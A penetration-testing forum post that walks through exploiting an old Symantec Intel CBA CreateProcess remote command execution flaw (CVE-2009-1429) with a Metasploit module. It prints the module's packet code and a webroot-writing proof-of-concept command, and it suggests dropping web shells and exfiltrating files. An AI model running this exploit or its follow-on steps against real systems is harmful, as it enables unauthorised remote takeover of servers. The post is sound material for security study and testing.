Garage4hackers Forum - Penetration testing - [Intel CBA CreateProcess() on Symantec ]

One of the best way of getting a good output form a PT when you have a huge no of IPs for audit,and considerably less time, is to
[+] Put an Nmap scan on all the IPs and see if it has any common service running
[-] Admins who manage DCs will usually have the habit of installing extra add-don services to their host
[-] System updates are properly done, but add-don updates are neglected.
[+]So same third party services will be installed widely on all the host .

Any ways this common stupid practice was something which I noticed, but this find is all about exploiting the Intel CBA CreateProcess() on Symantec , which has the CVE:http://cve.mitre.org/cgi-bin/cvename...=CVE-2009-1429 and Nessus -Home feed have a plug-in for listing this bug.

[+] Symantec is the widely used IDS+AV system for most of the corporate networks
[+]Symantec Client will be installed on all the systems
[-] So if one target is found, the possibility is high that many other vulnerable systems will be there.

Triggering the exploit

This one is actually a command execution exploit , that when a data packet with String CMD is passed to the listener, its passed on to the symentec product CreateProcess and is interpreted as command, making it possible to execute OS commands remotely.

MSF have a module for this one in:
auxiliary\admin\symantec\cba_exec.rb

Code:

len  = 2 + datastore['CMD'].length

                data =  [0x00000000].pack('V')
                data << len.chr
                data << "\x00"
                data << datastore['CMD'] + " " //windows command to be passed
                data << "\x00"

                print_status("Sending command: #{datastore['CMD']}")
                sock.put(data)

                res = sock.get_once

                    if (!res)
                        print_error("Did not recieve data. Failed?")
                    else
                        print_status("Got data, execution successful!")
                    end

                disconnect

I loaded MSF with the associated auxiliary.
[+] Current PT was done on a symentec Corporate edition Installed servers, and its was easy to 0wn them all

.

I loaded MSF and choose the right exploit

woot woot the commands I set got executed successfully

Well my scope of work was VA + PT but as targets were critical ones, I shouldn't by any chance execute, change any passwords, but obviously a POC of the exploit is need in the report so what I did was this.

[+] When nmap was done it showed that IIS was running with IIS default page iisstart.html.

[+] Now that we have a world readable folder in the C:\inetepub\wwwroot we could Change|Modify|Edit|Add any files there .

[+] Just set the Exploit CMD argument with

Code:

 echo FB1H2S > c:\\inetpub\\wwwroot\\fb1h2s.html

But I wanted the default page

, so just modified the iisstart.html page with a Security audit banner

[+] Like wise I took the other Vulnerable Systems

[+] But this is not the extend of what we could do, we could drop a PHP, ASP shell on the IIS directory and could run them , could set arbitrary registry values and execute other malicious scripts, download other sensitive files by moving them to the servers HTTP directory and lot more, but as my scope of work was over I quit thinking more wicked stuffs.

Regards
FB1H2S